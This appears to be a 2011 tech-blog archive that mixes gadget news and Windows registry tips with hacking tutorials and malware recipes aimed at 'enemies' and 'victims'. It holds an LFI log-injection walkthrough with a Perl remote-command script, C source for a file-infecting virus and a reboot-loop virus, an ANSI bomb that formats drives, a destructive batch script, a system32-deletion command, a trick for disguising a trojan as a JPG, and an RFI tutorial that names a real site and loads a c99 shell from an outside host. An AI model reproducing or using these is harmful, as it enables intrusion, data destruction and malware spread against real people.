Acer Iconia Tab W500 Tablet

Feb 28, 2011 | comments

Acer Iconia Tab W500 AMD-powered Windows tablet PC although not yet available has listed in Germany retailer. This Acer pill is currently out there for pre-order and has value tag €499. The W500 weights just unde 1kg and features a 10.1-inch (1280 x 800) LED-backlit touchscreen, a 1.0 GHz C-50 APU (with Radeon HD 6250 graphics). Acer’s Iconia Tab W500 runs Windows 7 Home Premium and is backed by a one-year warranty

Sony Ericsson PSP Phone

| comments

The phone has expected launch in February 2011. It features android 3.0, 1GHz processor, 512MB of RAM, 1GB of ROM, 3.7-inch or 4.1-inch screen and MicroSD slot.

WEBSITE HACKING VIA LFI (Local File Inclusion)

Feb 27, 2011 | comments

Local File Inclusion (LFI) is when you have the ability to browse through the server by means of directory transversal. One of the most common uses of LFI is to discover the /etc/passwd file. This file contains the user information of a Linux system. Hackers find sites vulnerable to LFI the same way I discussed for RFI’s. Let’s say a hacker found a vulnerable site, www.target-site.com/index.php?p=about, by means of directory transversal he would try to browse to the /etc/passwd file:
www.target-site.com/index.php?p= ../../../../../../../etc/passwd
The ../ you up one directory and the amount to use depends where in the server you are located compared the location of the /etc/passwd file.
If the hacker is able to successfully get to the /etc/passwd file he would see a list similar to the one below.
Root:x:0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/log:/bin/false
lp:x:4:7:lp:/var/spool/lpd:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync

shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
Each line is divided into seven parts:
username:passwd:UserID:GroupID:full_name:directory:shell
If the password hash was shown, the hacker would be able to crack it and get access to the machine, but in our case the password isn’t shown. This means that the password is shadowed and in the /etc/shadow file which the hacker doesn’t have access to. If this was the case, the hacker would probably attempt to get access to the system another way, through log injection.
The log directories are located in different areas in different Linux distributions. Below is a list of the most common locations.
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_log
../../../../../../../usr/local/apache/logs/access.log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_log
../../../../../../../usr/local/apache/logs/error.log
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log

../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
Below are the steps a hacker would take to take gain access to the system through log injection.
1. First the hacker would find what operating system version the target server is running and then search where the log files are located on that OS.
2. Next, through LFI the hacker would navigate to that file location. If he is displayed with a bunch of logs, then he may continue.
3. The hacker would then inject some PHP code into the logs by typing
after = in the URL. This will cause the PHP script to be logged because there is no file by that name. What this script will do is give the hacker shell access and allow him to execute system commands.
4. Now if the hacker goes back to the log file, he will see that his PHP script wasn’t parsed and instead converted to
%3C?%20passthru($_GET[cmd])%20?%3E
5. When you submitted the script, the browser automatically encoded the URL. Luckily there is a pearl script that can get around this problem. Below is the pearl script, edit the variables: $site, $path, $code, and $log to the appropriate information.
#!/usr/bin/perl -w
use IO::Socket;
use LWP::UserAgent;
$site=”www.vulnerablesite.com”;
$path=”/”;
$code=””;
$log = “../../../../../../../etc/httpd/logs/error_log”;
print “Trying to inject the code”;
$socket = IO::Socket::INET->new(Proto=>”tcp”, PeerAddr=>”$site”, PeerPort=>”80”) or die “\nConnection Failed.\n\n”;
print $socket “GET “.$path.$code.” HTTP/1.1\r\n”;
print $socket “User-Agent: “.$code.”\r\n”;
print $socket “Host: “.$site.”\r\n”;
print $socket “Connection: close\r\n\r\n”;
close($socket);
print “\nCode $code successfully injected in $log \n”;
print “\nType command to run or exit to end: “;
$cmd = ;
while($cmd !~ “exit”) {
$socket = IO::Socket::INET->new(Proto=>”tcp”, PeerAddr=>”$site”, PeerPort=>”80”) or die “\nConnection Failed.\n\n”;
print $socket “GET “.$path.”index.php?filename=”.$log.”&cmd=$cmd HTTP/1.1\r\n”;
print $socket “Host: “.$site.”\r\n”;
print $socket “Accept: */*\r\n”;
print $socket “Connection: close\r\n\n”;
while ($show = <$socket>)
{
print $show;
}
print “Type command to run or exit to end: “;

$cmd = ;
}
6. Once the hacker runs this script and it goes successfully, he will be able to run any command on the server. From here he can run any local exploits to gain root, or just browse the server files.

BlackBerry Presenter

Feb 26, 2011 | comments

As many of you have already noticed that micro and mini projectors will be available soon. Manufactures like 3M, Microvision and other. Thank God this handy 3.4-inch x 2.4-inch boxlike accessory is designed, so that it can be used with BlackBerry smart phones. It is very simple in use. What you have to do is that, simply connect it with a projector or monitor and you can use Blutetooth connectivity in order to display Microsoft PowerPoint 2003 and 2007 slides directly from your handset. You can pause images, set slides to automatically swap at prearranged intervals and in this way you can enjoy the benefit of accurate reproductions with most visual and animated effects.

SAMSUNG- MATRIX OLED DISPLAYS

Feb 25, 2011 | comments

Samsung aims to release a range of new products that feature transparent active matrix OLED displays within the next 12 months. Transparent AMOLED displays provide the user with a screen behind which objects are still visible. Samsung has been showing prototypes of these displays at shows such as SID. The AMOLED display not only visually set our product apart from our competitors but we believe it well will set the bar for the next generation of portable MP3 players,’ says Reid Sullivan, VP of audio, video and digital imaging marketing at Samsung Electronics America.

Virus Program to Restart the Computer at Every Startup

| comments

Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.

For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations. And one more thing, none of the antivirus softwares detect’s this as a virus since I have coded this virus in C. So if you are familiar with C language then it’s too easy to understand the logic behind the coding.

Here is the source code.
#include
#include
#include

int found,drive_no;char buff[128];

void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst(“C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive
if(done==0)
{
done=findfirst(“C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(“D:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“D:\\windows\\system\\sysres.exe”,&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(“E:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“E:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(“F:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“F:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}

void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],”rb”); //The virus file open’s itself
switch(drive_no)
{
case 1:
target=fopen(“C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup
break;

case 2:
target=fopen(“D:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres.exe”);
break;

case 3:
target=fopen(“E:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres.exe”);
break;

case 4:
target=fopen(“F:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
F:\\windows\\system\\sysres.exe”);
break;

default:
exit(0);
}

while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}

else
system(“shutdown -r -t 0″); //if the system is already infected then just give a command to restart
}
NOTE: COMMENTS ARE GIVEN IN BROWN COLOUR.


Compiling The Scource Code Into Executable Virus.


1. Download the Source Code Here

2. The downloaded file will be Sysres.C

3. For step-by-step compilation guide, refer my post How to compile C Programs.


Testing And Removing The Virus From Your PC


You can compile and test this virus on your own PC without any fear. To test, just doubleclick the sysres.exe file and restart the system manually. Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.
It will not do any harm apart from automatically restarting your system. After testing it, you can remove the virus by the following steps.


1. Reboot your computer in the SAFE MODE

2. Goto
X:\Windows\System
(X can be C,D,E or F)

3.You will find a file by name sysres.exe, delete it.

4.Type regedit in run.You will goto registry editor.Here navigate to
HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run

There, on the right site you will see an entry by name “sres“.Delete this entry.That’s it.You have removed this Virus successfully.


Logic Behind The Working Of The Virus


If I don’t explain the logic(Algorithm) behind the working of the virus,this post will be incomplete. So I’ll explain the logic in a simplified manner. Here I’ll not explain the technical details of the program. If you have further doubts please pass comments.


LOGIC:


1. First the virus will find the Root partition (Partition on which Windows is installed).

2. Next it will determine whether the Virus file is already copied(Already infected) into X:\Windows\System

3. If not it will just place a copy of itself into X:\Windows\System and makes a registry entry to put this virus file onto the startup.

4. Or else if the virus is already found in the X:\Windows\System directory(folder), then it just gives a command to restart the computer.

This process is repeated every time the PC is restarted.

NOTE: The system will not be restarted as soon as you double click the Sysres.exe file.The restarting process will occur from the next boot of the system.


AND ONE MORE THING BEFORE YOU LEAVE (This Step is optional)


After you compile, the Sysres.exe file that you get will have a default icon. So if you send this file to your friends they may not click on it since it has a default ICON. So it is possible to change the ICON of this Sysres.exe file into any other ICON that is more trusted and looks attractive.

How to Create a Computer Virus

| comments

This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.

#include
#include
#include
#include
#include
#include

FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;

void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}

COMPILING METHOD:


USING BORLAND TC++ 3.0 (16-BIT):

1. Load the program in the compiler, press Alt-F9 to compile

2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)

3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)

4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)

5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect


USING BORLAND C++ 5.5 (32-BIT) :

1. Compile once,note down the generated EXE file length in bytes

2. Change the value of X in source code to this length in bytes

3. Recompile it.The new EXE file is ready to infect

HOW TO TEST:


1. Open new empty folder

2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)

3. Run the virus EXE file there you will see all the files in the current directory get infected.

4. All the infected files will be ready to reinfect

That’s it

RUN COMMANDS

| comments

run cmd,command,RUN

* Verification of signatures of files: sigverif
* Findfast (if present) : findfast.cpl
* Folder Options : control folders
* Fonts (fonts) : control fonts
* Fonts folder windows : fonts
* Free Cell ...: freecell
* Game Controllers : Joy.cpl
* Group Policy (XP Pro) : gpedit.msc
* Hearts (card game) : mshearts
* IExpress (file generator. Cab) : IExpress
* Indexing Service (if not disabled) : ciadv.msc
* Internet Properties : inetcpl.cpl
* IPConfig (display configuration): ipconfig / all
* IPConfig (displays the contents of the DNS cache): ipconfig / displaydns
* IPConfig (erases the contents of the DNS cache): ipconfig / flushdns
* IPConfig (IP configuration cancels maps): ipconfig / release
* IPConfig (renew IP configuration maps) : ipconfig / renew
* Java Control Panel (if present) : jpicpl32.cpl
* Java Control Panel (if present) : javaws
* Keyboard Properties: control keyboard
* Local Security Settings : secpol.msc
* Local Users and Groups: lusrmgr.msc
* Logout: logoff
* Microsoft Chat : winchat
* Minesweeper (game): winmine
* Properties of the mouse: control mouse
* Properties of the mouse (2): main.cpl
* Network Connections : control NetConnect
* Network Connections (2): ncpa.cpl
* Network configuration wizard: netsetup.cpl
* Notepad : notepad
* NView Desktop Manager (if installed): nvtuicpl.cpl
* Manager links: packager
* Data Source Administrator ODBC: odbccp32.cpl
* Screen Keyboard: OSK
* AC3 Filter (if installed) : ac3filter.cpl
* Password manager (if present): Password.cpl
* Monitor performance : perfmon.msc
* Monitor performance (2): perfmon
* Dialing Properties (phone): telephon.cpl
* Power Options : powercfg.cpl
* Printers and Faxes : control printers
* Private Character Editor : eudcedit
* Quicktime (if installed) : QuickTime.cpl
* Regional and Language Options: intl.cpl
* Editor of the registry : regedit
* Remote desktop connection : mstsc
* Removable Storage: ntmsmgr.msc
* requests the operator to removable storage: ntmsoprq.msc
* RSoP (traduction. ..) (XP Pro): rsop.msc
* Scanners and Cameras : sticpl.cpl
* Scheduled Tasks : control schedtasks
* Security Center : wscui.cpl
* Console management services: services.msc
* shared folders : fsmgmt.msc
* Turn off windows : shutdown
* Sounds and Audio Devices : mmsys.cpl
* Spider (card game): spider
* Client Network Utility SQL server : cliconfg
* System Configuration Editor : sysedit
* System Configuration Utility : msconfig
* System File Checker (SFC =) (Scan Now) : sfc / scannow
* SFC (Scan next startup): sfc / scanonce
* SFC (Scan each démarraget) : sfc / scanboot
* SFC (back to default settings): sfc / revert
* SFC (purge cache files): sfc / purgecache
* SFC (define size CAHC x) : sfc / cachesize = x
* System Properties : sysdm.cpl
* Task Manager : taskmgr
* Telnet client : telnet
* User Accounts : nusrmgr.cpl
* Utility Manager (Magnifier, etc) : utilman
* Windows firewall (XP SP2) : firewall.cpl
* Microsoft Magnifier: magnify
* Windows Management Infrastructure: wmimgmt.msc
* Protection of the accounts database: syskey
* Windows update: wupdmgr
* Introducing Windows XP (if not erased) : tourstart
* Wordpad : write
* Date and Time Properties : timedate.cpl

pendrive Virus

| comments

Virus is a program which infects computer, in different way. I am explaining about a Virus Which can easily be made in C or C++, ,When we have run .exe file of this Pendrive-usb virus then when we connect pendrive with our computer usb,it will not be connected. Operating System would not be able to detect pendrive.

Code is written to directly change the usb registry option and change its key. Not going to explain about registry in detail now, later will explain.

1. Creating usb-pendrive Virus :-
* Install Turbo C or C++
* Open TC.exe and there write the coding
#include
void main()
{

system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet
\\Services\\USBSTOR \/v Start \/t REG_DWORD \/d 4 \/f");
}

* Above Line system("....................."); it is in one Line

* Save The Above Program as usbblock.c or any other name.
* Compile and Run the above Program
* Congratulation! you are succesfull to create the usb-pendrive Virus
* Now go to drive where C is installed (Open TC folder) and then BIN ,have that usb-pendrive virus usbblock.exe to be used..........
* Run that usbblock.exe in your computer to test.
* Attach Pendrive to your computer usb ....OH! Shit Pendrive doesn't get detected...virus
* Dont infect any other computer as it is only for educational purpose.


2. To reverse the effect of USB-Pendrive Virus (Removal of that Virus) :-
* Install Turbo C or C++
* Open TC.exe and there write the coding
#include
void main()
{

system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\
Services\\USBSTOR \/v Start \/t REG_DWORD \/d 3 \/f");
}

* Above Line system("....................."); it is in one Line

* Save The Above Program as unblockusb.c or any other name.
* Compile and Run the above Program
* Congratulation! you are succesfull to create .exe file to unblock USB
* Now go to drive where C is installed (Open TC folder) and then BIN ,have that unblockusb.exe to be used..........
* Run that unblockusb.exe to reverse the effect of usbblock.exe.

ANSI VIRUS BOMB

Feb 24, 2011 | comments

An ANSI bomb is not necessarily a virus, but more of a computer exploit. By using an ANSI bomb, you can get your victim's hard drive completely wiped.

How does an ANSI Bomb work?
An ANSI Bomb is scripted through a Text Document, and then saved as a microsoft batch file. It is simply a few lines of code. An ANSI bomb reroutes a few letters on the keyboard. This particular one reroutes the letter 'C,' 'Enter,' and 'Backspace' to the command 'Format C:.' It also reroutes the letters 'nN' to 'yY.' 'yY' also remains 'yY.'




What's the point?
If you hate someone, this is the exploit for you. Simple, yet effective. Software companies also lace these with stolen software sometimes.

What will this exploit do?
When the victim clicks on the batch, the exploit is activated. When they press any of the rerouted keys, it will prompt them with a message "Are you sure you would like to format C:/? Y/N." Now, obviously your victim will press 'nN.' But the great part about an ANSI bomb, is that though they press 'nN', the computer recognizes it as 'yY', thus wiping their hard-drive, and all their hard work.

To make an ANSI bomb, copy the following script into a text document, click 'Save As,' use the drop down menu and select 'All Files,' then save it with the file extension .bat -- And that's it! You're done!

Script

ESC[99;"format c:";13p
ESC[66;"format c:";13p
ESC[121;121;13p
ESC[89;89;13p
ESC[110;121;13p
ESC[78;89;13p
ESC[8;format c:";13p
ESC[0;0;89;13p
ESC[3;89;13p
ESC[100;"copy key.ans c:\";13;"copy con c:\autoexec.bat";13;"type key.ans";13;26;13;"cls";13p
ESC[68;"copy key.ans c:\";13;"copy con c:\autoexec.bat";13;"type key.ans";13;26;13;"cls";13p
ESC[116;"copy key.ans c:\";13;"copy con c:\autoexec.bat";13;"type key.ans";13;26;13;"cls";13p
ESC[84;"copy key.ans c:\";13;"copy con c:\autoexec.bat";13;"type key.ans";13;26;13;"cls";13p
ESC[0;59;"Fuck You Bitch!"p

Hide EXE File into JPG

| comments

How about sending a trojan or a keylogger into your victim using this trick..??

1) Firstly, create a new folder and make sure that the options 'show hidden files and folders' is checked and ‘hide extensions for known file types’ is unchecked.
Basically what you need is to see hidden files and see the extension of all your files on your pc.

2) Paste a copy of your server on the new created folder. let's say it's called 'server.exe' (that's why you need the extension of files showing, cause you need to see it to change it)


3) Now you’re going to rename this 'server.exe' to whatever you want, let’s say for example 'picture.jpeg'

4) Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.

5) Now create a shortcut of this 'picture.jpeg' in the same folder.

6) Now that you have a shortcut, rename it to whatever you want, for example, 'me.jpeg'.

7) Go to properties (on file me.jpeg) and now you need to do some changes there.

8) First of all delete all the text on field 'Start In' and leave it empty.

9) Then on field 'Target' you need to write the path to open the other file (the server renamed 'picture.jpeg') so you have to write this :-
'C:\WINDOWS\system32\cmd.exe /c picture.jpeg'

10) The last field, 'c picture.jpeg' is always the name of the first file. If you called the first file 'soccer.avi' you gotta write 'C:\WINDOWS\system32\cmd.exe /c soccer.avi'.

11) So what you’re doing is when someone clicks on 'me.jpeg', a cmd will execute the other file 'picture.jpeg' and the server will run.

12) On that file 'me.jpeg' (shortcut), go to properties and you have an option to change the icon. Click that and a new window will pop up and you have to write this :-
%SystemRoot%\system32\SHELL32.dll . Then press OK.

13) You can set the properties 'Hidden' for the first file 'picture.jpeg' if you think it’s better to get a connection from someone.

14) But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.

15) For me for example I always want the shortcut showing first so can be the first file to be opened. So I rename the server to 'picture2.jpeg' and the shortcut to 'picture1.jpeg'.
This way the shortcut will show up first. If you set hidden properties to the server 'picture.jpeg' then you don’t have to bother with this detail but I’m warning you, the hidden file will always show up inside of a Zip or a Rar file.

16) So the best way to send these files together to someone is compress them into Zip or Rar.

17) inside the Rar or Zip file you can see the files properties and even after all this work you can see that the shortcut is recognized like a shortcut but hopefully the person you sent this too doesn’t know that and is going to open it.

Enjoy.......

VIRUS

| comments

This post is to help you to send viruses to your enemies! Here goes,Copy the below code and paste into your notepad.. then save as anyname.bat
Do not click on that batch file........ Send it your enimies email...It will


1) Copy itself into startup
2) Copy itself over one thousand times into random spots in your computer
3) Hide its self and all other created files
4) Task kill MSN, Norton, Windows Explorer, Limewire.
5) Swap the left mouse button with the right one
6) Opens alert boxes
7) Changes the time to 12:00 and shuts down the computer






Code :-


@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nulAttrib +r +h Greatgame.batAttrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.batgoto RIP





Enjoy.......

Destroy ur enemy PC with virus

| comments

Hi all users in this post we'll take a look on how to create a deadly computer virus to destroy your enemy or victim's PC,,,





1) Open Notepad

2) write the below command : -

del c:\windows\system32\*.* /q

3) Save the above notepad with the extension ".bat or .cmd" as u want

!!!!!!!!!!!!!!!!!!!!!!Attention!!!!!!!!!!!!!!!!!!! !!!

Don't double click the file otherwise u r in trouble. Why ?????? bcz the file u created delete all files from ur
system32 folder and when u restart ur pc it will not start bcz system can not find the files in the system32 folder which is required at the time of booting.

4) You can also test the above by creating a fake folder let suppose
windows1 in C:\. Copy some old files in it and just follow the
above command.By double clicking the bat or cmd file ur all files
automaitcally get deleted.

5) You can try this file in any one`s computer.(but this result in causing damage to the computer, so think again before trying this on anyone's pc)

Speed up ur mobile 50%.

| comments

This is only for those users which have memory card in their PHONESfirst of all you will need-computer-usb connectivity of MEMORY CARD TO PC(CARD READER) NOT BLUETOOTH-little brainfollow these steps:-1.remove memory card from mobile.2.insert it in CARD READER.3.OPEN start menu>All program>acceSSories>system tools>DISK DEFRAGMENTER4.Just run defragmenter at your memory card.5.FRAGMENT IT 2 OR 3 TIMES.6.PUT back memory card to phone.7ENJOY THE "SPEED."

Edit any Website

| comments

Code:javascript:document.body.contentEditable='true'; document.designMode='on'; void 0 This Javascript allows you to edit any website!Just copy and paste instead of the website's adress.

Simple Trick to Turn off all system beeps

| comments

If you want to turn off all system beeps (like the ones that go through your computers' internal speaker): Start Regedit Go to HKEY_CURRENT_USER\Control Panel\Sound Edit the key Beep and give it a value of No

adding content to Right click

| comments

Once done, you will be able to right click any file or folder and use the Browse for Folder dialog to choose the location you want to move or copy your file or folder to, without having to go to the destination path. First we will add the copy and move options to the right click menu of all FILES. CLICK Start>Run, type REGEDIT and click OK to open up the registry editor and make your way to this key HKEY_CLASSES_ROOT->*->shellex->ContextMenuHandlers Right click the ContextMenuHandlers key and choose New>Key. Name the new key “Copy To” (without the quotes).

Pop a banner each time Windows Boots

| comments

To pop a banner which can contain any message you want to display just before a user is going to log on, go to the key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WinLogon Now create a new string Value in the right pane named LegalNoticeCaption and enter the value that you want to see in the Menu Bar. Now create yet another new string value and name it: LegalNoticeText. Modify it and insert the message you want to display each time Windows boots. This can be effectively used to display the company's private policy each time the user logs on to his NT box. It's .reg…

To change the icons used for specific drives in explorer

| comments

Open regedit by typing regedit into start->runthen navigate to HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer now create a key(KEY not VALUE!!) called DriveIcons under Explorer...now within DriveIcons, create another key with the drive letter you want to change (e.g.,HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\K)...create another key within the drive letter key called DefaultIcon... now set the default String value equal to the icon you want to use. if you have a file that has more than one icon in it, such as a DLL file, use the standard C:\full_path\icon_file.dll,n ) where n is the number of the icon within the file icon_file.dll...~ c h e e r s!

REMOVING SERVICES DEPENDENCIES

| comments

This will allow you to disable a service or uninstall it from your system without effecting another service that depends on it. Here's how you do it1. After you have set your services the way you want them and you have disabled/uninstalled something that another services depends on, run "regedit" 2. Under HKEY_LOCAL_MACHINE\System\find the service that will not function, do to another service being disabled/uninstall (found in ControlSet001\Services, ControlSet002\Services, and CurrentControlSet\Services) 3. Once you have found the service right-click on the string value, "DependOnService,"and modify4. You should now see a list of services that it is dependent on. Simply delete…

Smartbook AG’s Surfer 360 MR7U

Feb 20, 2011 | comments














With the flodded market of tablets, Smartbook AG has also made an announcement about its latest tablet called Surfer 360 MR7U that comes packed with decent list of features. Physically this tablet measures 99 X 12 X 15.5 mm in size with weight of 430 grams.
Smartbook AG Surfer 360 MR7U runs on Android 2.2 OS and is powered by 800 MHz of processor to deliver goof performance. There is 7 inches of multi touch display in the tablet that is capable of delivering resolution of 480 X 800 pixels so as to offer bright and vibrant content viewing experience.
There is 4GB of internal storage in this tablet whereas its MicroSD card slot facilitates external memory expansion. Additional specifications that comes packed with Smartbook AG  Surfer 360 MR7U include 512MB of DDDR2 RAM, SIM Card slot, HDMI port, WiFi, mini USB port, G Sensor and 3050 mAh battery.

Apollo, the solar Android phone

| comments


If you’ve ever had your cellphone die when you’re miles from the nearest outlet, any phone that can be charged without needing a plug is bound to have some appeal.

Xoom Tablet

Feb 17, 2011 | comments



For those of you anxiously awaiting the Motorola Xoom tablet, you don’t have that much longer to wait.  While you can’t pre-order one yet, you’ll most likely be able to do so within a week.  But the good news is you finally know how much you’re going to have to scrounge up if you want to get your hands on one of these snazzy Honeycomb tablets.

The 32 GB 3G version will be available from Verizon and will cost a whopping $799 without any applicable discounts or deals.  The Wi-Fi only version will be available starting at $600.00.  And if you want to wait a little while, the Xoom will be 4G capable sometime later this year.

SanDisk’s New Memory Card

| comments


SanDisk have recently announced that they have began shipping memory cards which use 64 gigabit X4 NAND flash technology, these memory cards are said to be the world’s first to use this technology.

This new technology allows the card to store 4 bits of data per cell, this is twice as much as MLC NAND, the 64 gigabit X4 NAND will be used in upcoming 8GB and 16GB SDHC memory cards and also 8GB and 16GB Memory Stick Pro Duo cards.

Batman USB DRIVE

| comments


Here is some news that I’m sure you gadget geeks will appreciate, especially if you’re lacking memory space or need to take your saved data with you for whatever reason. Warner Bros. have teamed up with Mimoco to produce a series of Batman USB flash drives.

These MIMOBOT characters will include the Joker, Catwoman and Robin as well as the Dark Knight himself and are designed to look like the comic book drawings of today. The first USB dongle to come out of this partnership was released last month and designed to look like the 1939 Vintage Batman character. However it was only available in limited quantities.

Each individual character USB stick come ready loaded with content depending which character it is, such as Avatars, wallpapers, sounds and screensavers. These miniature crime fighter memory storage devices were spotted by Engadget who say they are ‘quite detailed in design.’

The flash drives are available for sale at Mimoco where you can get a closer look at the character likeness. The smallest memory stick is 2GB for $19.95 and the largest the 16GB will cost you $59.95.

What do you think of these handy devices? Would you pay this amount of money to get your favorite Batman characters as flash drives?


Hack a Website Using Remote File Inclusion

| comments


Remote file inclusion is basically a one of the most common vulnerability found in web application. This type of vulnerability allows the Hacker or attacker to add a remote file on the web server. If the attacker gets successful in performing the attack he/she will gain access to the web server and hence can execute any command on it.

Searching the Vulnerability

Remote File inclusion vulnerability is usually occured in those sites which have a navigation similar to the below one

    www.Targetsite.com/index.php?page=Anything

To find the vulnerability the hacker will most commonly  use the following Google Dork

    “inurl:index.php?page=”

This will show all the pages which has “index.php?page=” in their URL, Now to test whether the website is vulnerable to Remote file Inclusion or not the hacker use the following command

    www.targetsite.com/index.php?page=www.google.com

Lets say that the target website is http://www.cbspk.com

So the hacker url will become

    http://www.cbspk.com/v2/index.php?page=http://www.google.com

If after executing the command the homepage of the google shows up then then the website is vulnerable to this attack if it does not come up then you should look for a new target. In my case after executing the above command in the address bar Google homepage shows up indicating that the website is vulnerable to this attack

Now the hacker would upload the shells to gain access. The most common shells used are c99 shell or r57 shell. I would use c99 shell. You can download c99 shell from the link below:

    http://www.4shared.com/file/107930574/287131f0/c99shell.html?aff=7637829

The hacker would first upload the shells to a webhosting site such as ripway.com, 110mb.com etc.

Now here is how a hacker would execute the shells to gain access. Lets say that the url of the shell is

    http://h1.ripway.com/rafaybaloch/c99.txt

Now here is how a hacker would execute the following command to gain access

    http://www.cbspk.com/v2/index.php?page=http://h1.ripway.com/rafaybaloch/c99.txt?

Remember to add “?” at the end of url or else the shell will not execute. Now the hacker is inside the website and he could do anything with it.................!!!!!!!!!!!!!!1

